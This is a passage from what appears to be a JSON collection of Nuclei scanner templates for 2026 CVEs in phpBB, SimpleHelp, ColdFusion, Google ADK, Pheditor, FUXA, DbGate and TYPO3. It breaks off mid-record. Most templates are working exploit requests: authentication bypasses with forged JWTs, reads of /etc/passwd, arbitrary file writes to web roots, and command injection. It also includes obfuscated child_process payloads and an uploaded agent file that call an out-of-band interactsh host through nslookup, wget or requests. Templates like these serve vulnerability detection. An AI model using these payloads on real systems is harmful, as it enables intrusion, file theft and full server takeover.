An unauthenticated attacker can log in as any user including administrators, gaining full control over the phpBB forum, leading to data theft, defacement, and complete forum takeover.\n  remediation: |\n    Upgrade phpBB to version 3.3.17 or later.\n  reference:\n    - https://www.aikido.dev/blog/authentication-bypass-phpbb-technical-writeup\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-48611\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-48611\n    epss-score: 0.0386\n    epss-percentile: 0.8971\n    cwe-id: CWE-287\n    cpe: cpe:2.3:a:phpbb:phpbb:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: phpbb\n    product: phpbb\n    shodan-query: http.component:\"phpBB\"\n    fofa-query: app=\"phpBB\"\n  tags: cve,cve2026,phpbb,auth-bypass,vuln,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /ucp.php?mode=login_link&auth_provider=apache&login_link_aikido=1 HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Authorization: Basic YWRtaW46eA==\n\n        login_username=admin&login_password=x&login=Login\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: set_cookie\n        words:\n          - \"phpbb_sid\"\n          - \"phpbb\"\n        condition: and\n\n      - type: status\n        status:\n          - 302\n# digest: 490a00463044022017cfde935b13cd52ce9b43c53e1aa133c2ede98e88524cccb2234b2f4aeb141e022053a32f8007dc2e9b09fe97cb9cf579692a84c3ef44425bc1fc2331fb343420ce:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-48611.yaml","vuln_id":"cve-2026-48611"},{"raw":"id: CVE-2026-48558\n\ninfo:\n  name: SimpleHelp <=5.5.15 - OIDC JWT Authentication Bypass\n  author: 0x_Akoko,pdteam\n  severity: critical\n  description: |\n    SimpleHelp <= 5.5.15 and 6.0 pre-release contain an authentication bypass caused by lack of cryptographic signature verification in OIDC tokens, letting remote unauthenticated attackers gain technician sessions, exploit requires OIDC authentication configured.\n  impact: |\n    Remote attackers can bypass authentication and multi-factor authentication to gain full technician access.\n  remediation: |\n    Update to a version later than 5.5.15 or the final 6.0 release.\n  reference:\n    - https://horizon3.ai/attack-research/disclosures/cve-2026-48558-simplehelp-authentication-bypass-iocs/\n    - https://simple-help.com/security/simplehelp-security-update-2026-05\n    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/simplehelp_oidc_auth_bypass_rce.rb\n    - https://github.com/J4ck3LSyN-Gen2/CVE-2026-48558\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-48558\n    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-48558\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-48558\n    cwe-id: CWE-347\n    epss-score: 0.64313\n    epss-percentile: 0.99194\n  metadata:\n    verified: true\n    max-request: 5\n    vendor: simple-help\n    product: simplehelp\n    shodan-query: html:\"SimpleHelp\"\n    fofa-query: body=\"SimpleHelp\"\n  tags: cve,cve2026,simplehelp,auth-bypass,oidc,jwt,kev,vkev,intrusive,vuln\n\nflow: |\n  (function () {\n    if (!http(1)) { return; }\n    var minor = parseInt(template[\"sh_minor\"] || \"99\");\n    if (isNaN(minor) || minor > 15) { return; }\n\n    http(2);\n    var providers_raw = template[\"providers_raw\"];\n    if (!providers_raw) { return; }\n\n    var providers;\n    try {\n      providers = JSON.parse(providers_raw);\n    } catch (e) { return; }\n    if (!providers || !providers[0]) { return; }\n\n    var provider = null;\n    for (var i = 0; i < providers.length; i++) {\n      if (providers[i][\"type\"] === \"oidc\" || providers[i][\"type\"] === \"azure\") {\n        provider = providers[i];\n        break;\n      }\n    }\n    if (!provider) { return; }\n\n    var root = (template[\"http_1_host\"] || \"\").replace(/\\/+$/, \"\");\n    if (!root) { return; }\n    provider[\"callback\"] = root + \"/webapps/technician/\";\n    set(\"oidc_payload_enc\", encodeURIComponent(JSON.stringify(provider)));\n\n    http(3);\n    var auth_url_str = template[\"auth_url_raw\"] || \"\";\n    var auth_url;\n    try {\n      auth_url = JSON.parse(auth_url_str);\n    } catch (e) {\n      auth_url = auth_url_str.replace(/^\"/, \"\").replace(/\"$/, \"\").trim();\n    }\n    if (!auth_url) { return; }\n\n    var state_m = auth_url.match(/[?&]state=([^&\\s\"'<>]+)/);\n    if (!state_m) { return; }\n\n    var nonce_m = auth_url.match(/[?&]nonce=([^&\\s\"'<>]+)/);\n    var nonce = nonce_m ? nonce_m[1] : \"\";\n\n    function b64url(s) {\n      var CHARS = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_\";\n      var bytes = [];\n      for (var c = 0; c < s.length; c++) { bytes.push(s.charCodeAt(c) & 0xFF); }\n      var out = \"\";\n      var j = 0;\n      while (j < bytes.length) {\n        var b0 = bytes[j++];\n        var b1 = (j < bytes.length) ? bytes[j++] : -1;\n        var b2 = (j < bytes.length) ? bytes[j++] : -1;\n        out += CHARS[b0 >> 2];\n        out += CHARS[((b0 & 3) << 4) | (b1 < 0 ? 0 : (b1 >> 4))];\n        if (b1 >= 0) { out += CHARS[((b1 & 15) << 2) | (b2 < 0 ? 0 : (b2 >> 6))]; }\n        if (b2 >= 0) { out += CHARS[b2 & 63]; }\n      }\n      return out;\n    }\n\n    var now = Math.floor(new Date().getTime() / 1000);\n    var jwt_header  = {\"alg\":\"none\",\"typ\":\"JWT\"};\n    var jwt_payload = {\n      \"sub\":                \"probe-cve-2026-48558\",\n      \"preferred_username\": \"probe-check\",\n      \"name\":               \"ProbeCheck\",\n      \"email\":              \"probe-check@probetest.invalid\",\n      \"iat\":                now,\n      \"exp\":                now + 3600\n    };\n    if (nonce) { jwt_payload[\"nonce\"] = nonce; }\n\n    var forged_jwt = b64url(JSON.stringify(jwt_header)) + \".\" +\n                     b64url(JSON.stringify(jwt_payload)) + \".x\";\n\n    set(\"oidc_post_body\",\n        \"state=\" + encodeURIComponent(state_m[1]) +\n        \"&id_token=\" + encodeURIComponent(forged_jwt));\n\n    http(4);\n\n    http(5);\n  })();\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/allversions\"\n\n    cookie-reuse: true\n\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"Visual Version:\\\\s+5\\\\.5\\\\.(\\\\d+)\"\n        internal: true\n\n    extractors:\n      - type: regex\n        name: sh_minor\n        part: body\n        group: 1\n        regex:\n          - \"Visual Version:\\\\s+5\\\\.5\\\\.(\\\\d+)\"\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/auth/v1/account/login_options\"\n\n    cookie-reuse: true\n\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n\n    extractors:\n      - type: dsl\n        name: providers_raw\n        dsl:\n          - \"body\"\n        internal: true\n\n  - raw:\n      - |\n        GET /auth/v1/account/oidc_get?payload={{oidc_payload_enc}} HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json, */*\n\n    cookie-reuse: true\n\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n\n    extractors:\n      - type: dsl\n        name: auth_url_raw\n        dsl:\n          - \"body\"\n        internal: true\n\n  - raw:\n      - |\n        POST /oidc HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        {{oidc_post_body}}\n\n    cookie-reuse: true\n    redirects: false\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200 || status_code == 302\"\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/auth/v1/account/status\"\n\n    cookie-reuse: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"FULLY_AUTHENTICATED\")'\n          - 'contains(body, \"\\\"code\\\":1\") || contains(body, \"\\\"code\\\": 1\")'\n        condition: and\n\n    extractors:\n      - type: dsl\n        dsl:\n          - 'username + \" | \" + email'\n\n      - type: json\n        part: body\n        json:\n          - \".user.username\"\n        name: username\n        internal: true\n\n      - type: json\n        part: body\n        json:\n          - \".user.emailAddress\"\n        name: email\n# digest: 4a0a00473045022100a41d78f75968fb7550ecac910710df1cafef1f0559f7a0d155fb2ccf6ca9262a02205f2fa5004012ee0e5d0a541b21648246ca20ee12d15932fa8262095913907ce2:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-48558.yaml","vuln_id":"cve-2026-48558"},{"raw":"id: CVE-2026-48313\n\ninfo:\n  name: ColdFusion - Path Traversal\n  author: watchtowr,DhiyaneshDk\n  severity: high\n  description: |\n    ColdFusion versions 2025.9, 2023.20 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to arbitrary file system read and limited write access. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue does not require user interaction. Scope is changed.\n  impact: |\n    Attackers can read sensitive files and write limited files outside intended directories, risking data exposure and modification.\n  remediation: |\n    Update to the latest version beyond 2025.9 or 2023.20.\n  reference:\n    - https://labs.watchtowr.com/its-37oc-and-all-we-can-think-about-is-coldfusion-adobe-coldfusion-security-bulletin-apsb26-68-cve-bonanza/\n  metadata:\n    verified: true\n    max-request: 2\n    fofa-query: app=\"Adobe-ColdFusion\"\n  tags: cve,cve2026,lfi,adobe,coldfusion,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /CFIDE/main/ide.cfm?ACTION=FILEIO HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/octet-stream\n\n        2:{{len}}:{{path}}000004:READ\n\n    payloads:\n      path:\n        - 'C:\\Windows\\win.ini'\n        - '/etc/passwd'\n      len:\n        - '000018'\n        - '000011'\n\n    attack: pitchfork\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '[fonts]'\n          - 'root:x:0:0:'\n        condition: or\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402200e76425afcb44662d7537e7c716f97abfe2a06954cadc8824938bbb52e30defd0220442c28f72298cbd81ae5ab35be62c6aa615b9193c447039812d1d82a5cdd21b3:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-48313.yaml","vuln_id":"cve-2026-48313"},{"raw":"id: CVE-2026-48282\n\ninfo:\n  name: Adobe ColdFusion - RDS Arbitrary File Write\n  author: watchtowr,DhiyaneshDk\n  severity: critical\n  description: |\n    ColdFusion versions 2025.9, 2023.20 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to arbitrary code execution in the context of the current user. The RDS FILEIO WRITE operation allows unauthenticated attackers to write arbitrary files when RDS is enabled with authentication disabled. Exploitation of this issue does not require user interaction. Scope is changed.\n  impact: |\n    An attacker can write arbitrary files to the server filesystem, leading to remote code execution by writing CFML webshells to the web root.\n  remediation: |\n    Update to ColdFusion 2025 Update 10 or ColdFusion 2023 Update 21 or later.\n  reference:\n    - https://helpx.adobe.com/security/products/coldfusion/apsb26-68.html\n    - https://labs.watchtowr.com/its-37oc-and-all-we-can-think-about-is-coldfusion-adobe-coldfusion-security-bulletin-apsb26-68-cve-bonanza/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-48282\n    epss-score: 0.42388\n    epss-percentile: 0.98641\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n  tags: cve,cve2026,rce,file-upload,adobe,coldfusion,rds,intrusive,kev,vkev\n\nvariables:\n  randfile: \"{{to_lower(rand_text_alpha(8))}}\"\n\nflow: |\n  http(\"write\") && http(\"verify\")\n\nhttp:\n  - id: write\n    raw:\n      - |\n        POST /CFIDE/main/ide.cfm?ACTION=FILEIO HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/octet-stream\n\n        4:{{pathlen}}:{{dirpath}}{{randfile}}.txt000005:WRITE000001:0000008:{{randfile}}\n\n    payloads:\n      dirpath:\n        - '/opt/coldfusion/cfusion/wwwroot/CFIDE/'\n        - 'C:\\ColdFusion2025\\cfusion\\wwwroot\\CFIDE\\'\n        - 'C:\\ColdFusion2023\\cfusion\\wwwroot\\CFIDE\\'\n\n      pathlen:\n        - '000050'\n        - '000052'\n        - '000052'\n\n    attack: pitchfork\n    stop-at-first-match: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"1:2:\")'\n        condition: and\n        internal: true\n\n  - id: verify\n    raw:\n      - |\n        GET /CFIDE/{{randfile}}.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '{{randfile}}'\n\n      - type: status\n        status:\n          - 200\n# digest: 490a004630440220294e8e40d3922d63bfdcd7f4d8e59e55b1f41cda6fdcab1e32aa9f11fdbe19f3022014ca41604c87eceb6c316a32e24f562cf53d4254612cfd3f8bc6b3422e3cf4e9:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-48282.yaml","vuln_id":"cve-2026-48282"},{"raw":"id: CVE-2026-4810\n\ninfo:\n  name: Google ADK-Python - Unauthenticated Builder Endpoint\n  author: dwisiswant0\n  severity: critical\n  description: |\n    Google Agent Development Kit (ADK) 1.7.0 through 1.28.1 and 2.0.0a1 through 2.0.0a2 on Python (OSS), Cloud Run, and GKE contains a code injection and missing authentication vulnerability, letting unauthenticated remote attackers execute arbitrary code on the server, exploit requires no authentication.\n  impact: |\n    Unauthenticated remote attackers can execute arbitrary code on the server, leading to full system compromise.\n  remediation: |\n    Upgrade to versions 1.28.1 and 2.0.0a2 or later and redeploy to production and local environments.\n  reference:\n    - https://github.com/google/adk-python/blob/main/CHANGELOG.md\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/U:Amber\n    cvss-score: 9.3\n    cve-id: CVE-2026-4810\n    epss-score: 0.01818\n    epss-percentile: 0.7777\n    cwe-id: CWE-306,CWE-94\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: google\n    product: adk-python\n    shodan-query: title:\"ADK\" http.component:\"uvicorn\"\n    fofa-query: body=\"ADK\" && header=\"uvicorn\"\n  tags: cve,cve2026,adk,google,rce,unauth,code-injection\n\nvariables:\n  multipart_boundary: \"{{md5(date_time('2006-01-02T15:04:05Z07:00'))}}\"\n  agent_name: \"{{rand_text_alpha(1)}}{{rand_text_alpha(7)}}\"\n  rand_instruction: \"{{rand_base(12)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /builder/save HTTP/1.1\n        Host: {{Hostname}}\n        Accept-Encoding: gzip, deflate, zstd\n        Accept: */*\n        Connection: keep-alive\n        Content-Type: multipart/form-data; boundary={{multipart_boundary}}\n\n        --{{multipart_boundary}}\n        Content-Disposition: form-data; name=\"files\"; filename=\"{{agent_name}}/agent.py\"\n        Content-Type: text/x-python\n\n        import requests\n        response = requests.get(\"http://{{interactsh-url}}\")\n        print(response.text)\n        from google.adk.agents import Agent\n        root_agent = Agent(name=\"{{agent_name}}\", model=\"gemini-2.0-flash\", instruction=\"{{rand_instruction}}\")\n\n        --{{multipart_boundary}}--\n\n      - |\n        GET /list-apps?detailed=true HTTP/1.1\n        Host: {{Hostname}}\n        Connection: close\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code_1 == 200 && body_1 == \"true\"\n          - status_code_2 == 200 && contains(body_2, concat(\"\\\"\", agent_name, \"\\\"\"))\n        condition: and\n\n      - type: word\n        part: interactsh_protocol\n        words:\n          - dns\n# digest: 490a0046304402204f6133bf45b80a757ead52d436f98641dbaef5dfa9e323f6f991f831836975a702207f1946eea9580ab535c4f310f307ab5d4503073942a99d796ba5d4d0361cedb2:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-4810.yaml","vuln_id":"cve-2026-4810"},{"raw":"id: CVE-2026-48030\n\ninfo:\n  name: Pheditor 2.0.1-2.0.3 - OS Command Injection\n  author: juoum00000\n  severity: critical\n  description: |\n    Pheditor 2.0.1 to - 2.0.4 contains an OS command injection caused by improper sanitization of the 'dir' POST parameter in the terminal action handler, letting authenticated users execute arbitrary OS commands with web server privileges.\n  impact: |\n    Authenticated users can execute arbitrary OS commands, leading to full remote code execution with web server privileges.\n  remediation: |\n    Upgrade to version 2.0.4 or later.\n  reference:\n    - https://github.com/advisories/GHSA-jvc5-6g7q-c843\n    - https://github.com/muslimbek-0x/CVE-2026-48030\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-48030\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 9.9\n    cve-id: CVE-2026-48030\n    epss-score: 0.05849\n    epss-percentile: 0.92848\n    cwe-id: CWE-78\n  metadata:\n    max-request: 4\n    verified: true\n    vendor: pheditor\n    product: pheditor\n    fofa-query: body=\"pheditor_password\"\n    shodan-query: http.html:pheditor\n  tags: cve,cve2026,rce,pheditor,authenticated\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        POST /pheditor.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        pheditor_password={{password}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 302'\n        internal: true\n\n  - raw:\n      - |\n        GET /pheditor.php HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"token\")'\n          - '!contains(body, \"pheditor_password\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: token\n        group: 1\n        internal: true\n        regex:\n          - 'token = \"([0-9a-f]{64})\"'\n\n  - raw:\n      - |\n        POST /pheditor.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=terminal&command=whoami&dir=/tmp%3B%20id%20%23&token={{token}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"uid=\")'\n        condition: and\n# digest: 4a0a00473045022032b63031df967f26282e34eed779ba2527c4cd7a4f649f78231441a7d68de3e3022100dddbfef194dfc7646396aef02df85ec95c78a6eb76e31c60ea2e128669eb17a6:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-48030.yaml","vuln_id":"cve-2026-48030"},{"raw":"id: CVE-2026-47717\n\ninfo:\n  name: FUXA 1.3.0 - Unauthenticated ICS/SCADA Project Data Disclosure\n  author: pussycat0x\n  severity: high\n  description: |\n    FUXA v1.3.0 exposes full SCADA/HMI project configuration via GET /api/project without authentication, even when secureEnabled is true. The secureFnc middleware auto-generates\n    a valid guest JWT when no token is provided, bypassing authentication. Exposed data includes server-side scripts, device configs, HMI views, and alarm definitions.\n  remediation: |\n    Upgrade to fuxa-server version 1.3.1 or later.\n  reference:\n    - https://github.com/advisories/GHSA-q3w6-q3hc-c5x6\n    - https://www.miggo.io/vulnerability-database/cve/CVE-2026-47717\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-47717\n    epss-score: 0.01403\n    epss-percentile: 0.71372\n    cwe-id: CWE-201\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: frangoteam\n    product: fuxa\n    shodan-query: http.title:\"FUXA\"\n    fofa-query: title=\"FUXA\"\n  tags: cve,cve2026,fuxa,ics,scada,unauth,exposure\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/project\"\n\n    headers:\n      Accept: application/json\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"\\\"devices\\\"\", \"\\\"hmi\\\"\", \"\\\"scripts\\\"\", \"\\\"views\\\"\")'\n          - 'contains_any(body, \"\\\"polling\\\"\", \"\\\"svgcontent\\\"\", \"\\\"ModbusTCP\\\"\", \"\\\"bkcolor\\\"\")'\n          - 'contains(content_type, \"application/json\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 490a004630440220143ece3d1830338591f49e8b46b603bc56bb7b37aaab2c39e9f2eabe8dc72cce02207498132e1b4dc5fdf0cf2de1287987ae1f767c5a891612240ea84fa79e96dff2:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-47717.yaml","vuln_id":"cve-2026-47717"},{"raw":"id: CVE-2026-47670\n\ninfo:\n  name: DbGate - Remote Code Execution via Dynamic Import Bypass\n  author: theamanrawat\n  severity: critical\n  description: |\n    DbGate versions <= 7.1.8 are vulnerable to authenticated remote code execution via the POST /runners/load-reader endpoint. The functionName parameter is directly interpolated into a JavaScript code template without sanitization. The require=null mitigation is bypassed via dynamic import().\n  impact: |\n    An authenticated user can escalate from web UI access to a root OS shell, steal infrastructure secrets from /proc/1/environ, extract other users credentials, pivot to internal networks, and install persistent backdoors.\n  reference:\n    - https://github.com/dbgate/dbgate/security/advisories/GHSA-wm5r-5qp3-5vxf\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-47670\n    - https://github.com/advisories/GHSA-wm5r-5qp3-5vxf\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H\n    cvss-score: 9.4\n    cve-id: CVE-2026-47670\n    epss-score: 0.01714\n    epss-percentile: 0.76396\n    cwe-id: CWE-77\n  metadata:\n    max-request: 3\n    verified: true\n    shodan-query: http.title:\"DbGate\"\n    fofa-query: title=\"DbGate\"\n    vendor: dbgate\n    product: dbgate\n  tags: cve,cve2026,dbgate,rce,vuln,auth\n\nvariables:\n  canary: \"{{rand_text_alpha(8)}}\"\n  jslfile: \"/tmp/_dbg_{{rand_text_alpha(6)}}.jsonl\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        POST /auth/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"amoid\":\"logins\",\"login\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"accessToken\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: json\n        name: token\n        part: body\n        json:\n          - '.accessToken'\n        internal: true\n\n  - raw:\n      - |\n        POST /runners/load-reader HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer {{token}}\n\n        {\"functionName\":\"csvReader\\nvar _f=await import('fs');var _c=await import('child_process');var _o=_c.execSync('id').toString().trim();_f.writeFileSync('{{jslfile}}',JSON.stringify({__isStreamHeader:true,columns:[{columnName:'out'}]})+String.fromCharCode(10)+JSON.stringify({out:'{{canary}}'+' '+_o})+String.fromCharCode(10));//\",\"props\":{}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 500'\n        internal: true\n\n  - raw:\n      - |\n        POST /jsldata/get-rows HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Authorization: Bearer {{token}}\n\n        {\"jslid\":\"file://{{jslfile}}\",\"offset\":0,\"limit\":100}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"{{canary}}\"\n\n      - type: word\n        part: body\n        words:\n          - \"uid=\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a0048304602210092ea7ae8742d869a8a28daff4f840db1f87ffd2558498955733f9ecdb91a1929022100efa5c2df799836603b929d1f902207b651914296466b7326ba7d882133460ff9:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-47670.yaml","vuln_id":"cve-2026-47670"},{"raw":"id: CVE-2026-47668\n\ninfo:\n  name: DbGate - Remote Code Execution via Anonymous JWT\n  author: benharvey-sage\n  severity: critical\n  description: |\n   DbGate contains a remote code execution vulnerability exploitable by unauthenticated attackers. The /auth/login endpoint issues anonymous JWT tokens without credentials, and the /runners/start endpoint accepts JavaScript payloads that execute via Node.js child_process, allowing arbitrary command execution on the server.\n  impact: |\n   An unauthenticated attacker can execute arbitrary system commands on the server with the privileges of the DbGate process, leading to full server compromise, data exfiltration from connected databases, lateral movement, and deployment of backdoors or ransomware.\n  remediation: |\n   Update DbGate to the latest patched version.\n  reference:\n    - https://www.cve.org/CVERecord?id=CVE-2026-47668\n    - https://github.com/dbgate/dbgate/security/advisories/GHSA-8v3q-9vmx-36vc\n    - https://github.com/dbgate/dbgate\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-47668\n    epss-score: 0.03882\n    epss-percentile: 0.89764\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: dbgate\n    product: dbgate\n    shodan-query: http.title:\"DbGate\"\n    fofa-query: title=\"DbGate\"\n  tags: cve,cve2026,dbgate,rce,oast,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /auth/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"amoid\":\"none\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"accessToken\")'\n        internal: true\n        condition: and\n\n    extractors:\n      - type: json\n        name: access_token\n        part: body\n        internal: true\n        json:\n          - '.accessToken'\n\n  - raw:\n      - |\n        POST /runners/start HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{access_token}}\n        Content-Type: application/json\n\n        {\"script\":{\"type\":\"json\",\"commands\":[{\"type\":\"assign\",\"variableName\":\"x\",\"functionName\":\"x;try{var m=process.mainModule;var r=m[\\\"req\\\"+\\\"uire\\\"];var n=[\\\"chi\\\",\\\"ld_\\\",\\\"pro\\\",\\\"ces\\\",\\\"s\\\"].join(\\\"\\\");var cp=r(n);var o=cp[\\\"exe\\\"+\\\"cSy\\\"+\\\"nc\\\"](\\\"nslookup {{interactsh-url}} || wget {{interactsh-url}}\\\").toString();}catch(e){};// \",\"props\":{}}],\"packageNames\":[]}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_any(interactsh_protocol, \"dns\", \"http\")'\n        condition: and\n# digest: 4a0a0047304502206ff9a42a8ce38569ad5bd003ecc962f436ce2414f63bd05cd6006401bc25cb44022100a6d6590a13734e42a838dbe36f31a16bcfe616e0fe5a865ef8202eecdfc50ccd:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-47668.yaml","vuln_id":"cve-2026-47668"},{"raw":"id: CVE-2026-46725\n\ninfo:\n  name: TYPO3 ceselector Extension - Insecure Deserialization\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    TYPO3 extension contains a PHP Object Injection caused by passing attacker-controlled cookie to unserialize() without validation, letting remote unauthenticated attackers achieve remote code execution, exploit requires Persistent Mode: Static configuration.\n  impact: |\n    Remote unauthenticated attackers can execute arbitrary code on the TYPO3 server, leading to full system compromise.\n  remediation: |\n    Update to the latest version of TYPO3 with the vulnerability fixed or apply patches that validate and sanitize unserialize input.\n  reference:\n    - https://typo3.org/security/advisory/typo3-ext-sa-2026-001\n    - https://packagist.org/packages/mmc/ceselector\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-46725\n    epss-score: 0.02625\n    epss-percentile: 0.84815\n    cwe-id: CWE-502\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: mmc\n    product: ceselector\n    framework: typo3\n    shodan-query: http.component:\"TYPO3 CMS\"\n  tags: cve,cve2026,typo3,deserialization,rce,ceselector,vuln\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(header, \"T3_ceselector_\")'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: ceselector_cookie\n        part: header\n        group: 1\n        regex:\n          - \"(?i)Set-Cookie:\\\\s*(T3_ceselector_\\\\d+)=\"\n        internal: true\n\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36\n        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n        Accept-Language: en-US,en;q=0.5\n        Connection: close\n        Cookie: 